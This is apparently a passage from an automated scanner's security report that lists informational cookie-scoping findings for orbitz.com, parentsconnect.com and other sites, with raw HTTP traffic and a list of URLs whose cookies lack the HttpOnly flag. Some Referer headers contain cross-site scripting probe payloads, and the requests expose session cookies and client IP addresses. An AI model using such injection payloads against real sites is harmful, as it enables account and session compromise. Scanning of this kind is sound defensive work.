DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/ViewRoundTripSearch?expandTravelers=true&z=2ec1&r=k HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.496. http://www.orbitz.com/App/ViewTravelWatchHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewTravelWatchHome

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewTravelWatchHome HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=F50F32CC6FAEFFAE6197D6FEE65AB6D2; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Content-Length: 109
Date: Thu, 03 Feb 2011 06:46:27 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

<meta http-equiv="refresh" content="0;url=/App/PartnerTracking?partnerUrl=TRAVELERUPDATE&z=8c50&r=1" />

11.497. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotels/?z=4fae&r=1o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573834583:ss=1296573790782; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e34fb045525d5f4f58455e445a4a4217b9

Response

11.498. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.499. https://www.orbitz.com/Secure/ViewSecureCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSecureCalendar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.500. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSetupCareAlertsProfile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.501. http://www.parentsconnect.com/flux/login_sync.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parentsconnect.com
Path:	/flux/login_sync.jhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MTV_ID=24.143.206.111.1296674852892; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flux/login_sync.jhtml HTTP/1.1
Host: www.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
MTVi-Edge-control: no-cache-downstream
Location: http://www.parentsconnect.com/
Content-Length: 0
Content-Type: text/html
Pragma: no-cache
Date: Wed, 02 Feb 2011 19:27:32 GMT
Connection: close
Set-Cookie: app-instance=relaunch-parentsconnect-com-1-kids-jboss-077; Path=/
Set-Cookie: JSESSIONID=3504E23633DB45B3563F6DBC8EC7D783.kids-jboss-077-811-mtvi-com-35852; Path=/
Set-Cookie: MTV_ID=24.143.206.111.1296674852892; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:32 GMT; Path=/
Set-Cookie: RtxAuth2407=; Domain=.parentsconnect.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IsMasterAuthResponse=true; Domain=.parentsconnect.com; Path=/
Cache-Control: max-age=0, no-cache, no-store

11.502. http://www.parentsconnect.com/flux/widgetRedirect.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parentsconnect.com
Path:	/flux/widgetRedirect.jhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MTV_ID=24.143.206.111.1296674850611; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:30 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flux/widgetRedirect.jhtml HTTP/1.1
Host: www.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
MTVi-Edge-control: no-cache-downstream
Location: http://widgets.flux.com/-/GetAuthCookie.ashx?returnUrl=http://www.parentsconnect.com/flux/login_sync.jhtml
Content-Length: 0
Content-Type: text/html
Pragma: no-cache
Date: Wed, 02 Feb 2011 19:27:30 GMT
Connection: close
Set-Cookie: app-instance=relaunch-parentsconnect-com-1-kids-jboss-078; Path=/
Set-Cookie: JSESSIONID=C1BE031A933DD422F9C84022E01396EA.kids-jboss-078-811-mtvi-com-35852; Path=/
Set-Cookie: MTV_ID=24.143.206.111.1296674850611; Domain=.parentsconnect.com; Expires=Sat, 30-Jan-2021 19:27:30 GMT; Path=/
Cache-Control: max-age=0, no-cache, no-store

11.503. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualtourist.com
Path:	/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VTT=64.14.197.3.1296663496.485621; Path=/; Domain=.virtualtourist.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html HTTP/1.1
Host: www.virtualtourist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.504. http://www.websitetoolbox.com/tool/view/mb/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.websitetoolbox.com
Path:	/tool/view/mb/file

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

newvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tool/view/mb/file?username=acslinda&id=512851 HTTP/1.1
Host: www.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:19 GMT
Content-Type: image/jpeg
Connection: keep-alive
Cache-Control: no-cache
Set-Cookie: hascookies=1; path=/; domain=.websitetoolbox.com;
Set-Cookie: hascookies=; path=/; domain=.websitetoolbox.com;
Expires: Nov, 8 1991 00:00:01 GMT
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.websitetoolbox.com/w3c/p3p.xml';
Set-Cookie: newvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: newvisit=; path=/; domain=.websitetoolbox.com;
Set-Cookie: lastvisit=1297002738; path=/; domain=.websitetoolbox.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=; path=/; domain=.websitetoolbox.com;
Content-disposition: inline; filename="Mastiff_logo_-_BEST_of_the_BEST_(2).jpg"
Content-transfer-encoding: binary
Content-Length: 33498

.....4Exif..II*...........................n...........v...(...........1.......~...2.......................i...........-.....
..'....
..'..Paint Shop Photo Album v5.21.2008:02:02 22:22:38............02
...[SNIP]...

11.505. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

newvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1296706031; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.506. http://www.worldmastiffforum.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/file

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

newvisit=1297002739; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
lastvisit=1296706072; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /file?id=858352 HTTP/1.1
Host: www.worldmastiffforum.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hascookies=1; newvisit=1296706072; lastvisit=1296706072

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:19 GMT
Content-Type: image/gif
Connection: keep-alive
Cache-Control: max-age=31104000
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.worldmastiffforum.com/w3c/p3p.xml';
Set-Cookie: newvisit=1297002739; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=1296706072; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Content-disposition: inline; filename="spermie.gif"
Content-transfer-encoding: binary
Content-Length: 829

GIF89a)..................!..NETSCAPE2.0.....!.. ....,....).....S...{...\NX.......wU....H
...X..d...S....}R......h.^.....;.......+...Es...\.b.i3.P..!.. ....,....).....L...{...\NX.......wU@...*.....+>
...[SNIP]...

11.507. http://www.youtube.com/user/sqlrtfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/sqlrtfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=4OZBfTCMbDE; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 04:07:11 GMT
GEO=b5d573ea86f2fe3582072f5171923c13cwsAAAAzVVOtwdbzTUop7w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/sqlrtfm HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 04:07:11 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=4OZBfTCMbDE; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 04:07:11 GMT
Set-Cookie: GEO=b5d573ea86f2fe3582072f5171923c13cwsAAAAzVVOtwdbzTUop7w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/das_captcha?next=/user/sqlrtfm
Content-Type: text/html; charset=utf-8
Connection: close

11.508. http://xcdn.xgraph.net/15530/db/xg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xcdn.xgraph.net
Path:	/15530/db/xg.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Sat, 01-Feb-2014 15:14:45 GMT; Path=/
_push4xgat=1296659685256; Domain=.xgraph.net; Expires=Thu, 03-Feb-2011 15:14:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4d1ec56b7612a62c HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=7AC30F7C62CFAB36F552D9C49D5A30EF; _xguid=8E756760D5075E9B78AC3BF5CB20BCB1; _mpush=2797DC348F9097BCD57A6B8F5F5D25DC

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Wed, 02 Feb 2011 15:14:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:14:45 GMT
Connection: close
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Sat, 01-Feb-2014 15:14:45 GMT; Path=/
Set-Cookie: _push4xgat=1296659685256; Domain=.xgraph.net; Expires=Thu, 03-Feb-2011 15:14:45 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;

12. Cookie without HttpOnly flag set previous next
There are 771 instances of this issue:

https://admin.testandtarget.omniture.com/
https://admin.testandtarget.omniture.com/a
https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp
https://admin.testandtarget.omniture.com/login
https://admin.testandtarget.omniture.com/login_hal.css
https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js
https://admin.testandtarget.omniture.com/skins/omniture/login.css
https://admin.testandtarget.omniture.com/skins/omniture/static_header.css
https://admin.testandtarget.omniture.com/user/forgot_password.jsp
http://advertising.aol.com/privacy/advertisingcom/opt-out
http://amihackerproof.com/
http://blekko.com/
http://blekko.com/ws/http:/2mdn.net/%20/domain
http://blogs.ittoolbox.com/pm/ppm
http://boardreader.com/moduleindex.php
http://brothercake.com/site/resources/scripts/onload/
http://bugs.jquery.com/ticket/7509
https://careers.microsoft.com/
http://ccc01.opinionlab.com/comment_card.asp
http://ccc01.opinionlab.com/o.asp
http://clickaider.com/
http://corp.orbitz.com/
http://corp.orbitz.com/careers
http://corp.orbitz.com/partnerships/advertise.html
http://corp.orbitz.com/partnerships/affiliates.html
http://cruises.orbitz.com/
http://dating.msn.com/index.aspx
http://dating.msn.com/search/index.aspx
http://dev.twitter.com/
https://faq.orbitz.com/
https://faq.orbitz.com/app/answers/detail/a_id/15644
http://games.msn.com/
http://hackergearonline.com/
http://ie6funeral.com/
http://inforavel.com/ad_type.php
http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html
http://leads.demandbase.com/
http://m.twitter.com/
http://mad4milk.net/
http://nationalcybersecurity.com/
http://outsideonline.com/
http://pressroom.orbitz.com/
https://secure.avangate.com/order/checkout.php
http://solutions.liveperson.com/ref/lppb.asp
http://sorry.google.com/sorry/Captcha
http://spoofem.com/
http://trw.com/
http://trw.mediaroom.com/index.php
http://twitter.com/
http://twitter.com/BWBLLC
http://twitter.com/BW_Technology
http://twitter.com/Chester_Pitts
http://twitter.com/Cirque
http://twitter.com/JetBlue
http://twitter.com/JohnsHopkinsSPH
http://twitter.com/McKQuarterly
http://twitter.com/MomsWhoSave
http://twitter.com/NetworkConnects
http://twitter.com/Nightline
http://twitter.com/NoReservations
http://twitter.com/NylonMag
http://twitter.com/OmnitureEMEA
http://twitter.com/PeaceCorps
http://twitter.com/Support
http://twitter.com/TakeoSpikes51
http://twitter.com/TomorrowCounsel
http://twitter.com/VirginiaBeachWk
http://twitter.com/Wyome655
http://twitter.com/about
http://twitter.com/about/contact
http://twitter.com/about/resources
http://twitter.com/account/complete
http://twitter.com/account/resend_password
http://twitter.com/arnui
http://twitter.com/ashleytisdale
http://twitter.com/best_golf
http://twitter.com/business
http://twitter.com/buyantsogtoo
http://twitter.com/chain_llc
http://twitter.com/chain_llc_cod
http://twitter.com/chain_llc_mg
http://twitter.com/cloudscan
http://twitter.com/coolmompicks
http://twitter.com/davidgregory
http://twitter.com/designmilk
http://twitter.com/donlomb
http://twitter.com/favorites/toptweets.json
http://twitter.com/gamespot
http://twitter.com/home
http://twitter.com/jasmith579
http://twitter.com/jobs4writers
http://twitter.com/ligatt
http://twitter.com/lijobs_sales
http://twitter.com/login
http://twitter.com/millenniumpr
http://twitter.com/newtwitter
http://twitter.com/omniture
http://twitter.com/omniturecare
http://twitter.com/orbitz
http://twitter.com/privacy
http://twitter.com/prolawrssfeed
http://twitter.com/qianam
http://twitter.com/rosyresources
http://twitter.com/sarahdessen
http://twitter.com/science
http://twitter.com/scribe
http://twitter.com/search
http://twitter.com/sessions/change_locale
http://twitter.com/sethmeyers21
http://twitter.com/share
http://twitter.com/signup
http://twitter.com/sp_arizona
http://twitter.com/sp_oregon
http://twitter.com/sp_tx
http://twitter.com/toptweets/favorites
http://twitter.com/tos
http://twitter.com/widgets
https://twitter.com/
https://twitter.com/about
https://twitter.com/about/contact
https://twitter.com/about/resources
https://twitter.com/account/complete
https://twitter.com/account/resend_password
https://twitter.com/login
https://twitter.com/privacy
https://twitter.com/sessions
https://twitter.com/sessions/change_locale
https://twitter.com/sessions/destroy
https://twitter.com/signup
https://twitter.com/tos
http://updates.orbitz.com/
http://updates.orbitz.com/flight_status
http://www.amihackerproof.com/
http://www.answerbag.com/
https://www.astaro.co.uk/beacon/(beid
https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1
https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1
https://www.astaro.com/user/login
https://www.astaro.de/beacon/(beid
http://www.astaro.es/
https://www.astaro.net/beacon/(beid
http://www.autocheck.com/
http://www.bbbonline.org/cks.asp
http://www.benjaminsterling.com/experiments/jqShuffle/
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/airline-ticket-deals.do
http://www.cafemom.com/group/416
http://www.cafemom.com/group/46574
http://www.directstartv.com/
http://www.ebookers.com/
http://www.faneuilhallmarketplace.com/
http://www.gorp.com/
http://www.hotelclub.com/
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.kampyle.com/
http://www.ligattsecurity.com/
http://www.livestrong.com/
http://www.milleniumdental.net/
http://www.mywot.com/en/scorecard/2mdn.net
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.opinionlab.com/ozone/24-7.asp
http://www.orbitz.com/flight-info/
http://www.orbitz.com/hotels/
http://www.orbitz.com/hotels/
http://www.orbitz.com/hotels/Canada--ON/Toronto/
http://www.orbitz.com/hotels/France/Nice/
http://www.orbitz.com/hotels/France/Paris/
http://www.orbitz.com/hotels/Mexico/
http://www.orbitz.com/hotels/Mexico/Cancun/
http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/
http://www.orbitz.com/hotels/United_Kingdom/London/
http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/
http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/%20
http://www.orbitz.com/hotels/United_States--CA/San_Diego/
http://www.orbitz.com/hotels/United_States--CA/San_Francisco/
http://www.orbitz.com/hotels/United_States--FL/Miami/
http://www.orbitz.com/hotels/United_States--FL/Orlando/
http://www.orbitz.com/hotels/United_States--IL/Chicago/
http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/
http://www.orbitz.com/hotels/United_States--NY/New_York/
http://www.orbitz.com/trips/writeReview
https://www.orbitz.com/account/login
https://www.orbitz.com/account/registration
https://www.orbitz.com/trips/writeReview
http://www.parentsconnect.com/flux/login_sync.jhtml
http://www.parentsconnect.com/flux/widgetRedirect.jhtml
http://www.pctools.com/free-antivirus/
http://www.ratedesi.com/
http://www.ratestogo.com/
http://www.thespanner.co.uk/2009/03/25/xss-rays/
